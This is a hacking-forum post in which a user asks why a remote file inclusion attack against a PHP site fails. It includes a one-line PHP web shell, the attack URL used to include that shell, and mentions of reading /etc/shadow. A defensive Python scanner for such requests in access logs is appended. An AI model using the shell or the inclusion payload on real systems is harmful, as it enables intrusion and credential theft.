HellBound Hackers | Computer General | Web hacking

next step


Guest
Posted on 05-02-06 20:42
I recently found a web site vulnerable to PHP injection, but there are some things that make no sense. I have the password hashes, I can read all the PHP sources, and I can see the files and directories. But...
The first thing is, let's say I have this code in http://myserver/cmd.php:
Code

<? passthru($cmd); ?>

When I inject it like this:
http://target.com/index.php?page=http://myserver/cmd.php?cmd=ls
it doesn't work, but when I change the source to:
Code

<? passthru("ls"); ?>

it works and shows the list of files.
I'm wondering why? Is there any problem with that PHP script?

Secondly, it seems like I can access files and even etc/shadow, but I can't edit/remove/make new files and directories.
Can you explain why it is like this?

EDIT: never mind :)

GreyFox






Edited by on 06-02-06 01:37
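
From the defender's side, the request shape in the post above (a page-selector parameter whose value is a remote URL) is easy to spot in web server access logs. The following is an added example, not part of the original post: the log lines and IP addresses are constructed, and the `ignore` allowlist and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A parameter value that begins with a URL scheme or PHP stream wrapper.
REMOTE_VALUE = re.compile(r"\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Request part of a Common/Combined Log Format line.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample access log (documentation IPs; hostnames reused from the post).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Feb/2006:20:40:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Feb/2006:20:41:13 +0000] "GET /index.php?page=http://myserver/cmd.php?cmd=ls HTTP/1.1" 200 734',
    '198.51.100.7 - - [05/Feb/2006:20:41:40 +0000] "GET /index.php?page=http%3A%2F%2Fmyserver%2Fcmd.php HTTP/1.1" 200 734',
    '192.0.2.10 - - [05/Feb/2006:20:42:02 +0000] "GET /login.php?next=http://target.com/home HTTP/1.1" 302 0',
]

def remote_include_params(target):
    """Return (name, value) pairs whose decoded value starts like a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches double-encoded values
        if REMOTE_VALUE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines, ignore=frozenset()):
    """Return (line_no, client_ip, param, value) for each suspicious parameter.

    `ignore` is an assumed allowlist of parameters that legitimately carry URLs.
    """
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        for name, value in remote_include_params(match.group("target")):
            if name not in ignore:
                findings.append((line_no, line.split()[0], name, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, ignore={"next"}):
        print(finding)
```

Without an `ignore` entry, the constructed `next=` redirect on the last line is reported as well, which is why parameters that legitimately hold URLs need to be listed explicitly.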